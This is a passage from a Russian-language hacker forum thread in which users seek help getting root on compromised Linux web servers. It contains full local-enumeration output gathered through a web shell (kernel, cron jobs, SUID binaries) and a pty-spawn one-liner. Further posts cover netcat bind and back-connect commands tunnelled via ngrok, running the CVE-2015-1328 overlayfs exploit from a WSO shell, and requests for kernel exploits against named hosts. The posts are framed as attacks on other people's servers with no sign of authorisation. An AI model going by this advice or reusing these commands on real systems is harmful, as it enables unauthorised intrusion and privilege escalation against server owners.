drwxr-xr-x 3 root root 4096 Oct 2 2017 efi
drwxr-xr-x. 2 root root 4096 Oct 25 2016 grub
drwx------. 5 root root 4096 Oct 5 12:03 grub2
-rw-r--r--. 1 root root 40878462 Oct 25 2016 initramfs-0-rescue-41227fcee63d4c579f21e742e4225972.img
-rw------- 1 root root 49753219 Oct 2 2017 initramfs-0-rescue-bacc12ed2ab34144b90ba0c3fd7a4e64.img
-rw------- 1 root root 17882518 Oct 2 2017 initramfs-3.10.0-514.26.2.el7.x86_64.img
-rw------- 1 root root 18383893 Oct 2 2017 initramfs-3.10.0-514.26.2.el7.x86_64kdump.img
-rw------- 1 root root 18311470 May 23 09:05 initramfs-3.10.0-693.17.1.el7.x86_64.img
-rw------- 1 root root 12776420 May 23 09:04 initramfs-3.10.0-693.17.1.el7.x86_64kdump.img
-rw------- 1 root root 17643933 Mar 5 2018 initramfs-3.10.0-693.2.2.el7.x86_64.img
-rw------- 1 root root 18139075 Mar 5 2018 initramfs-3.10.0-693.2.2.el7.x86_64kdump.img
-rw------- 1 root root 18342351 Oct 5 12:03 initramfs-3.10.0-862.14.4.el7.x86_64.img
-rw------- 1 root root 12496997 Oct 31 15:50 initramfs-3.10.0-862.14.4.el7.x86_64kdump.img
-rw------- 1 root root 18342164 Oct 5 12:04 initramfs-3.10.0-862.3.2.el7.x86_64.img
-rw------- 1 root root 12496939 Oct 5 12:02 initramfs-3.10.0-862.3.2.el7.x86_64kdump.img
-rw-r--r--. 1 root root 610918 Oct 2 2017 initrd-plymouth.img
-rw-r--r-- 1 root root 277955 Jul 4 2017 symvers-3.10.0-514.26.2.el7.x86_64.gz
-rw-r--r-- 1 root root 293109 Jan 25 2018 symvers-3.10.0-693.17.1.el7.x86_64.gz
-rw-r--r-- 1 root root 293064 Sep 13 2017 symvers-3.10.0-693.2.2.el7.x86_64.gz
-rw-r--r-- 1 root root 305158 Sep 26 17:17 symvers-3.10.0-862.14.4.el7.x86_64.gz
-rw-r--r-- 1 root root 304943 May 22 01:52 symvers-3.10.0-862.3.2.el7.x86_64.gz
-rwxr-xr-x. 1 root root 5156528 Oct 25 2016 vmlinuz-0-rescue-41227fcee63d4c579f21e742e4225972
-rwxr-xr-x 1 root root 5878848 Oct 2 2017 vmlinuz-0-rescue-bacc12ed2ab34144b90ba0c3fd7a4e64
-rwxr-xr-x 1 root root 5397008 Jul 4 2017 vmlinuz-3.10.0-514.26.2.el7.x86_64
-rwxr-xr-x 1 root root 5890720 Jan 25 2018 vmlinuz-3.10.0-693.17.1.el7.x86_64
-rwxr-xr-x 1 root root 5878848 Sep 13 2017 vmlinuz-3.10.0-693.2.2.el7.x86_64
-rwxr-xr-x 1 root root 6398144 Sep 26 17:15 vmlinuz-3.10.0-862.14.4.el7.x86_64
-rwxr-xr-x 1 root root 6228832 May 22 01:50 vmlinuz-3.10.0-862.3.2.el7.x86_64

//тут вообще не понятно что нам эта инфа дает.

$ ls -all --full-time /lib*

Code:
lrwxrwxrwx 1 root root 7 2018-05-23 09:01:47.909343039 +0200 /lib -> usr/lib
lrwxrwxrwx 1 root root 9 2018-05-23 09:01:47.909343039 +0200 /lib64 -> usr/lib64

//тут по идее должны были быть уязвимые библиотеки типа glibc ??

$ mount

Code:
/dev/vda1 on / type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
devtmpfs on /dev type devtmpfs (rw,nosuid,size=3896920k,nr_inodes=974230,mode=755 )
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode =000)
mqueue on /dev/mqueue type mqueue (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=31,pgrp=1,timeout=0,minproto=5,max proto=5,direct,pipe_ino=10542)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_age nt=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_prio,net_cls)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
configfs on /sys/kernel/config type configfs (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
/dev/vda1 on /tmp type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
/dev/vda1 on /var/tmp type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=781512k,mode=700)

//тут простая команда, но не ясно каую полезную информацию мы можем извлечь отсюда? Даже теоретически

$ df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/vda1 40G 7.2G 31G 20% /
devtmpfs 3.8G 0 3.8G 0% /dev
tmpfs 3.8G 0 3.8G 0% /dev/shm
tmpfs 3.8G 0 3.8G 0% /sys/fs/cgroup
tmpfs 3.8G 97M 3.7G 3% /run
tmpfs 764M 0 764M 0% /run/user/0

//аналогично

$ cat /etc/issue

\S

Kernel \r on an \m

дальше на счёт крона. предлагаю даже модифицировать мануал в 1м посте:

$ cat /etc/crontab

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

$ ls /etc/cron*

Code:
/etc/cron.deny
/etc/crontab

/etc/cron.d:
0hourly
clamav-update
sa-update

/etc/cron.daily:
exim-tidydb
logrotate
man-db.cron
phpsess_cron

/etc/cron.hourly:
0anacron

/etc/cron.monthly:

у меня лично там такая вот дребедень, мб кто скажет что в ней есть что-то потенциально уязвимое?))

Code:
$ cat /etc/cron.d/0hourly
# Run the hourly jobs
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
01 * * * * root run-parts /etc/cron.hourly
$ cat /etc/cron.d/clamav-update

$ cat /etc/cron.d/sa-update
# *** DO NOT MODIFY THIS FILE ***
### Spamassassin Rules Updates ###
#
# http://wiki.apache.org/spamassassin/RuleUpdates
#
# sa-update automatically updates your rules once per day if a spam daemon like
# spamd or amavisd are running. You can force sa-update to run in
# /etc/sysconfig/sa-update
#
# /var/log/sa-update.log contains a history log of sa-update runs

10 4 * * * root /usr/share/spamassassin/sa-update.cron 2>&1 | tee -a /var/log/sa-update.log

Code:
$ cat /etc/cron.daily/exim-tidydb
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
[ -r "$a" ] || continue
[ "${a%%.lockfile}" = "$a" ] || continue
/usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
$ cat /etc/cron.daily/logrotate

$ cat /etc/cron.daily/man-db.cron
#!/bin/bash

if [ -e /etc/sysconfig/man-db ]; then
. /etc/sysconfig/man-db
fi

if [ "$CRON" = "no" ]; then
exit 0
fi

renice +19 -p $$ >/dev/null 2>&1
ionice -c3 -p $$ >/dev/null 2>&1

LOCKFILE=/var/lock/man-db.lock

# the lockfile is not meant to be perfect, it's just in case the
# two man-db cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database
[[ -f $LOCKFILE ]] && exit 0

trap "{ rm -f $LOCKFILE ; exit 0; }" EXIT
touch $LOCKFILE
# create/update the mandb database
mandb $OPTS

exit 0
$ cat /etc/cron.daily/phpsess_cron
#!/bin/sh

# If You want to disable this task just comment next lines
if [ -x /usr/local/mgr5/sbin/phpsess_clean.sh ]; then
ionice -c 3 /usr/local/mgr5/sbin/phpsess_clean.sh
fi

$ cat /etc/sysconfig/man-db

Code:
# Set to no to disable daily man-db update by /etc/cron.daily/man-db.cron
CRON="yes"

# Options used by mandb in /etc/cron.daily/man-db.cron,
# we use -q as default, too much noise without.
OPTS="-q"

$ cat /etc/cron.hourly/0anacron

Code:
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s

//с кроном разобрались идем далее.

$ cat /proc/version

Code:
Linux version 3.10.0-862.14.4.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-28) (GCC) ) #1 SMP Wed Sep 26 15:12:11 UTC 2018

//ничего особенного, версия сборки

$ cat /proc/sys/vm/mmap_min_addr

4096

//это че вообще такое?

$ pwd

/var/www/site.com/data/www/site.com/images/content

$ ls -la /usr/bin/staprun -- мне кажется команда устарела, вывода по ней нет

$ ls -la /usr/bin/*run

-rwxr-xr-x 1 root root 392328 Sep 26 21:11 /usr/bin/systemd-run

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-x--- 1 root dbus 58016 Apr 11 2018 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 36280 Apr 11 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x 1 root root 11376 Sep 26 20:25 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 11216 Apr 11 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 1357728 Mar 14 2018 /usr/sbin/exim
-rwsr-xr-x 1 root root 15432 Apr 11 2018 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 78216 Nov 5 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 57576 Apr 11 2018 /usr/bin/crontab
-rwsr-x--x 1 root apache 11264 Jan 25 2016 /usr/bin/pwauth-isp
-rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd
-rwsr-x--- 1 root apache 11256 Sep 1 2015 /usr/bin/pwauth
---s--x--x 1 root root 143248 Jun 27 20:03 /usr/bin/sudo
-rwsr-xr-x 1 root root 44320 Aug 16 20:47 /usr/bin/mount
-rwsr-xr-x 1 root root 32184 Aug 16 20:47 /usr/bin/su
-rwsr-xr-x 1 root root 27680 Apr 11 2018 /usr/bin/pkexec
-rws--x--x 1 root root 24048 Aug 16 20:47 /usr/bin/chfn
-rwsr-xr-x 1 root root 41776 Nov 5 2016 /usr/bin/newgrp
-rwsr-xr-x 1 root root 64240 Nov 5 2016 /usr/bin/chage
-rwsr-xr-x 1 root root 32048 Aug 16 20:47 /usr/bin/umount
-rwsr-xr-x 1 root root 52952 Apr 11 2018 /usr/bin/at
-rws--x--x 1 root root 23960 Aug 16 20:47 /usr/bin/chsh

//cуидники. polkit к примеру мог быть уязвим, но нет.

В общем такая вот задача, господа Камрады. Нид хелп :3

PiroCat

08.11.2018, 07:03

гг, после команды

python -c 'import pty; pty.spawn("/bin/sh")'

прямо в ВСО я получил

504 Gateway Time-out

nginx/1.14.0

DOS вектор)

так что на сегодня тестирование окончено)) сори за офтоп.

PiroCat

13.12.2018, 01:09

Господа, как порутать линуху?

PiroCat

13.12.2018, 01:10

За то время как я запостил вывод по командам меня успели йобнуть аваковцы, я получил санкцию с домашним арестом, одуплился, а тут досихпор 0 на массу. НИД ХЕЛП)

madik

13.12.2018, 01:41

PiroCat said:
↑ (https://antichat.live/posts/4258808/)
И еще вопрос. В шапке указаны команды для вывода информации, где может быть потенциально уязвимая часть ОС. Но нету никаких комментариев на этот счет. Немогли бы вы хоть в двух словах разжевать что к чему в этих строках? Я немного модифицировал команды для более полного вывода.
Spoiler
$ uname -a

Code:
Linux vps459476.ovh.net 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

//ну тут вроде бы понятно
$ ls -all /boot

Code:
total 308208
dr-xr-xr-x. 5 root root 4096 Oct 31 15:50 .
dr-xr-xr-x. 19 root root 4096 Nov 7 03:01 ..
-rw-r--r-- 1 root root 171 Jul 4 2017 .vmlinuz-3.10.0-514.26.2.el7.x86_64.hmac
-rw-r--r-- 1 root root 171 Jan 25 2018 .vmlinuz-3.10.0-693.17.1.el7.x86_64.hmac
-rw-r--r-- 1 root root 170 Sep 13 2017 .vmlinuz-3.10.0-693.2.2.el7.x86_64.hmac
-rw-r--r-- 1 root root 171 Sep 26 17:15 .vmlinuz-3.10.0-862.14.4.el7.x86_64.hmac
-rw-r--r-- 1 root root 170 May 22 01:50 .vmlinuz-3.10.0-862.3.2.el7.x86_64.hmac
-rw------- 1 root root 3114352 Jul 4 2017 System.map-3.10.0-514.26.2.el7.x86_64
-rw------- 1 root root 3232454 Jan 25 2018 System.map-3.10.0-693.17.1.el7.x86_64
-rw------- 1 root root 3228852 Sep 13 2017 System.map-3.10.0-693.2.2.el7.x86_64
-rw------- 1 root root 3414754 Sep 26 17:15 System.map-3.10.0-862.14.4.el7.x86_64
-rw------- 1 root root 3409912 May 22 01:50 System.map-3.10.0-862.3.2.el7.x86_64
-rw-r--r-- 1 root root 137701 Jul 4 2017 config-3.10.0-514.26.2.el7.x86_64
-rw-r--r-- 1 root root 140915 Jan 25 2018 config-3.10.0-693.17.1.el7.x86_64
-rw-r--r-- 1 root root 140898 Sep 13 2017 config-3.10.0-693.2.2.el7.x86_64
-rw-r--r-- 1 root root 147859 Sep 26 17:15 config-3.10.0-862.14.4.el7.x86_64
-rw-r--r-- 1 root root 147823 May 22 01:50 config-3.10.0-862.3.2.el7.x86_64
drwxr-xr-x 3 root root 4096 Oct 2 2017 efi
drwxr-xr-x. 2 root root 4096 Oct 25 2016 grub
drwx------. 5 root root 4096 Oct 5 12:03 grub2
-rw-r--r--. 1 root root 40878462 Oct 25 2016 initramfs-0-rescue-41227fcee63d4c579f21e742e4225972.img
-rw------- 1 root root 49753219 Oct 2 2017 initramfs-0-rescue-bacc12ed2ab34144b90ba0c3fd7a4e64.img
-rw------- 1 root root 17882518 Oct 2 2017 initramfs-3.10.0-514.26.2.el7.x86_64.img
-rw------- 1 root root 18383893 Oct 2 2017 initramfs-3.10.0-514.26.2.el7.x86_64kdump.img
-rw------- 1 root root 18311470 May 23 09:05 initramfs-3.10.0-693.17.1.el7.x86_64.img
-rw------- 1 root root 12776420 May 23 09:04 initramfs-3.10.0-693.17.1.el7.x86_64kdump.img
-rw------- 1 root root 17643933 Mar 5 2018 initramfs-3.10.0-693.2.2.el7.x86_64.img
-rw------- 1 root root 18139075 Mar 5 2018 initramfs-3.10.0-693.2.2.el7.x86_64kdump.img
-rw------- 1 root root 18342351 Oct 5 12:03 initramfs-3.10.0-862.14.4.el7.x86_64.img
-rw------- 1 root root 12496997 Oct 31 15:50 initramfs-3.10.0-862.14.4.el7.x86_64kdump.img
-rw------- 1 root root 18342164 Oct 5 12:04 initramfs-3.10.0-862.3.2.el7.x86_64.img
-rw------- 1 root root 12496939 Oct 5 12:02 initramfs-3.10.0-862.3.2.el7.x86_64kdump.img
-rw-r--r--. 1 root root 610918 Oct 2 2017 initrd-plymouth.img
-rw-r--r-- 1 root root 277955 Jul 4 2017 symvers-3.10.0-514.26.2.el7.x86_64.gz
-rw-r--r-- 1 root root 293109 Jan 25 2018 symvers-3.10.0-693.17.1.el7.x86_64.gz
-rw-r--r-- 1 root root 293064 Sep 13 2017 symvers-3.10.0-693.2.2.el7.x86_64.gz
-rw-r--r-- 1 root root 305158 Sep 26 17:17 symvers-3.10.0-862.14.4.el7.x86_64.gz
-rw-r--r-- 1 root root 304943 May 22 01:52 symvers-3.10.0-862.3.2.el7.x86_64.gz
-rwxr-xr-x. 1 root root 5156528 Oct 25 2016 vmlinuz-0-rescue-41227fcee63d4c579f21e742e4225972
-rwxr-xr-x 1 root root 5878848 Oct 2 2017 vmlinuz-0-rescue-bacc12ed2ab34144b90ba0c3fd7a4e64
-rwxr-xr-x 1 root root 5397008 Jul 4 2017 vmlinuz-3.10.0-514.26.2.el7.x86_64
-rwxr-xr-x 1 root root 5890720 Jan 25 2018 vmlinuz-3.10.0-693.17.1.el7.x86_64
-rwxr-xr-x 1 root root 5878848 Sep 13 2017 vmlinuz-3.10.0-693.2.2.el7.x86_64
-rwxr-xr-x 1 root root 6398144 Sep 26 17:15 vmlinuz-3.10.0-862.14.4.el7.x86_64
-rwxr-xr-x 1 root root 6228832 May 22 01:50 vmlinuz-3.10.0-862.3.2.el7.x86_64

//тут вообще не понятно что нам эта инфа дает.
$ ls -all --full-time /lib*

Code:
lrwxrwxrwx 1 root root 7 2018-05-23 09:01:47.909343039 +0200 /lib -> usr/lib
lrwxrwxrwx 1 root root 9 2018-05-23 09:01:47.909343039 +0200 /lib64 -> usr/lib64

//тут по идее должны были быть уязвимые библиотеки типа glibc ??
$ mount

Code:
/dev/vda1 on / type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
devtmpfs on /dev type devtmpfs (rw,nosuid,size=3896920k,nr_inodes=974230,mode=755 )
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode =000)
mqueue on /dev/mqueue type mqueue (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=31,pgrp=1,timeout=0,minproto=5,max proto=5,direct,pipe_ino=10542)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_age nt=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_prio,net_cls)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
configfs on /sys/kernel/config type configfs (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
/dev/vda1 on /tmp type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
/dev/vda1 on /var/tmp type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=781512k,mode=700)

//тут простая команда, но не ясно каую полезную информацию мы можем извлечь отсюда? Даже теоретически
$ df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/vda1 40G 7.2G 31G 20% /
devtmpfs 3.8G 0 3.8G 0% /dev
tmpfs 3.8G 0 3.8G 0% /dev/shm
tmpfs 3.8G 0 3.8G 0% /sys/fs/cgroup
tmpfs 3.8G 97M 3.7G 3% /run
tmpfs 764M 0 764M 0% /run/user/0

//аналогично
$ cat /etc/issue
\S
Kernel \r on an \m
дальше на счёт крона. предлагаю даже модифицировать мануал в 1м посте:
$ cat /etc/crontab

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

$ ls /etc/cron*

Code:
/etc/cron.deny
/etc/crontab

/etc/cron.d:
0hourly
clamav-update
sa-update

/etc/cron.daily:
exim-tidydb
logrotate
man-db.cron
phpsess_cron

/etc/cron.hourly:
0anacron

/etc/cron.monthly:

у меня лично там такая вот дребедень, мб кто скажет что в ней есть что-то потенциально уязвимое?))

Code:
$ cat /etc/cron.d/0hourly
# Run the hourly jobs
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
01 * * * * root run-parts /etc/cron.hourly
$ cat /etc/cron.d/clamav-update

$ cat /etc/cron.d/sa-update
# *** DO NOT MODIFY THIS FILE ***
### Spamassassin Rules Updates ###
#
# http://wiki.apache.org/spamassassin/RuleUpdates
#
# sa-update automatically updates your rules once per day if a spam daemon like
# spamd or amavisd are running. You can force sa-update to run in
# /etc/sysconfig/sa-update
#
# /var/log/sa-update.log contains a history log of sa-update runs

10 4 * * * root /usr/share/spamassassin/sa-update.cron 2>&1 | tee -a /var/log/sa-update.log

Code:
$ cat /etc/cron.daily/exim-tidydb
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
[ -r "$a" ] || continue
[ "${a%%.lockfile}" = "$a" ] || continue
/usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
$ cat /etc/cron.daily/logrotate

$ cat /etc/cron.daily/man-db.cron
#!/bin/bash

if [ -e /etc/sysconfig/man-db ]; then
. /etc/sysconfig/man-db
fi

if [ "$CRON" = "no" ]; then
exit 0
fi

renice +19 -p $$ >/dev/null 2>&1
ionice -c3 -p $$ >/dev/null 2>&1

LOCKFILE=/var/lock/man-db.lock

# the lockfile is not meant to be perfect, it's just in case the
# two man-db cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database
[[ -f $LOCKFILE ]] && exit 0

trap "{ rm -f $LOCKFILE ; exit 0; }" EXIT
touch $LOCKFILE
# create/update the mandb database
mandb $OPTS

exit 0
$ cat /etc/cron.daily/phpsess_cron
#!/bin/sh

# If You want to disable this task just comment next lines
if [ -x /usr/local/mgr5/sbin/phpsess_clean.sh ]; then
ionice -c 3 /usr/local/mgr5/sbin/phpsess_clean.sh
fi

$ cat /etc/sysconfig/man-db

Code:
# Set to no to disable daily man-db update by /etc/cron.daily/man-db.cron
CRON="yes"

# Options used by mandb in /etc/cron.daily/man-db.cron,
# we use -q as default, too much noise without.
OPTS="-q"

$ cat /etc/cron.hourly/0anacron

Code:
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
/usr/bin/on_ac_power >/dev/null 2>&1
if test $? -eq 1; then
exit 0
fi
fi
/usr/sbin/anacron -s

//с кроном разобрались идем далее.
$ cat /proc/version

Code:
Linux version 3.10.0-862.14.4.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-28) (GCC) ) #1 SMP Wed Sep 26 15:12:11 UTC 2018

//ничего особенного, версия сборки
$ cat /proc/sys/vm/mmap_min_addr
4096
//это че вообще такое?
$ pwd
/var/www/site.com/data/www/site.com/images/content
$ ls -la /usr/bin/staprun -- мне кажется команда устарела, вывода по ней нет
$ ls -la /usr/bin/*run
-rwxr-xr-x 1 root root 392328 Sep 26 21:11 /usr/bin/systemd-run
$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-x--- 1 root dbus 58016 Apr 11 2018 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 36280 Apr 11 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x 1 root root 11376 Sep 26 20:25 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 11216 Apr 11 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 1357728 Mar 14 2018 /usr/sbin/exim
-rwsr-xr-x 1 root root 15432 Apr 11 2018 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 78216 Nov 5 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 57576 Apr 11 2018 /usr/bin/crontab
-rwsr-x--x 1 root apache 11264 Jan 25 2016 /usr/bin/pwauth-isp
-rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd
-rwsr-x--- 1 root apache 11256 Sep 1 2015 /usr/bin/pwauth
---s--x--x 1 root root 143248 Jun 27 20:03 /usr/bin/sudo
-rwsr-xr-x 1 root root 44320 Aug 16 20:47 /usr/bin/mount
-rwsr-xr-x 1 root root 32184 Aug 16 20:47 /usr/bin/su
-rwsr-xr-x 1 root root 27680 Apr 11 2018 /usr/bin/pkexec
-rws--x--x 1 root root 24048 Aug 16 20:47 /usr/bin/chfn
-rwsr-xr-x 1 root root 41776 Nov 5 2016 /usr/bin/newgrp
-rwsr-xr-x 1 root root 64240 Nov 5 2016 /usr/bin/chage
-rwsr-xr-x 1 root root 32048 Aug 16 20:47 /usr/bin/umount
-rwsr-xr-x 1 root root 52952 Apr 11 2018 /usr/bin/at
-rws--x--x 1 root root 23960 Aug 16 20:47 /usr/bin/chsh

//cуидники. polkit к примеру мог быть уязвим, но нет.
В общем такая вот задача, господа Камрады. Нид хелп :3

Братан используй спойлеры

madik

13.12.2018, 01:45

PiroCat said:
↑ (https://antichat.live/posts/4258805/)
Всем привет. Был занят некоторое время, вернулся к тому серваку.
Подскажите, не могу получите сессию неткат через бинд-порт\бэк-коннект.
Использую модифицированный ВСО, пробовал и оригинал. Не на СИ не на ПЕРЛ не бинд-порт не бэк-коннект не срабатывает.
Пользуюсь сервисом ngrok для туннелирования. Подскажите, куда копать?
p.s. группа юзера из под которого запущен апач
mgrsecure

Не работает?

>> netcat -l 4444

>> netcat your-domain.ru 4444

возможно его нет а может ограничен фаерволом

mrf0x

17.01.2019, 23:39

Привет. Есть:

Code:
Linux 3.13.0-37-generic #64-Ubuntu

Воспользовался:

Code:
EDB-ID:37292
CVE:2015-1328

Результатом должно быть это:

Code:
The attached exploit gives a root shell by creating a world-writable
/etc/ld.so.preload file.

Не без ошибок получилось добиться этого результата, в папке /etc лежит пустой файл ld.so.preload от рута (root/root), я могу его редактировать. Что можно дальше с этим сделать?

18.01.2019, 06:08

вы из веб-шела выполняли сплойт или из бэкконекта? После удачного выполнения он спавнит шелл от рута, выполните id

BabaDook

18.01.2019, 08:44

100% должно всё норм быть

mrf0x

18.01.2019, 13:01

b3 said:
↑ (https://antichat.live/posts/4278054/)
вы из веб-шела выполняли сплойт или из бэкконекта? После удачного выполнения он спавнит шелл от рута, выполните id

Делал из wso. Т.е. получается, он должен был "поднять" права wso или все же создать другой файл ("ld.so.preload") от рута?

grimnir

18.01.2019, 16:58

mrf0x said:
↑ (https://antichat.live/posts/4278112/)
Делал из wso. Т.е. получается, он должен был "поднять" права wso или все же создать другой файл ("ld.so.preload") от рута?

из шелла не выйдет ,нужно из терминала. Делаете в шелле бэкконект на комп и из терминала уже

Ravenous

21.06.2019, 00:53

После dirtycow local root эксплоита вышедшего в далеком еще 2016 году, что-нибудь появилось из локал рутов (такое что также работает на практике,А не только в типличных условиях) ?

21.06.2019, 02:24

как rdot затих так сразу рутать перестали?

BenderMR

01.07.2019, 13:24

Помогите сплойт найти

Code:
Linux ip-192-169-232-1**.secureserver.net 2.6.32-042stab133.2 #1 SMP Mon Aug 27 21:07:08 MSK 2018 x86_64 x86_64 x86_64 GNU/Linux

grimnir

01.07.2019, 18:53

BenderMR said:
↑ (https://antichat.live/posts/4316914/)
Помогите сплойт найти

Code:
Linux ip-192-169-232-1**.secureserver.net 2.6.32-042stab133.2 #1 SMP Mon Aug 27 21:07:08 MSK 2018 x86_64 x86_64 x86_64 GNU/Linux

информативно )

1 страница пример оформления

Сообщение с вопросом должно содержать информацию из вывода следующих команд:

и тут список

BenderMR

02.07.2019, 12:01

grimnir said:
↑ (https://antichat.live/posts/4316990/)
информативно )
1 страница пример оформления
Сообщение с вопросом должно содержать информацию из вывода следующих команд:

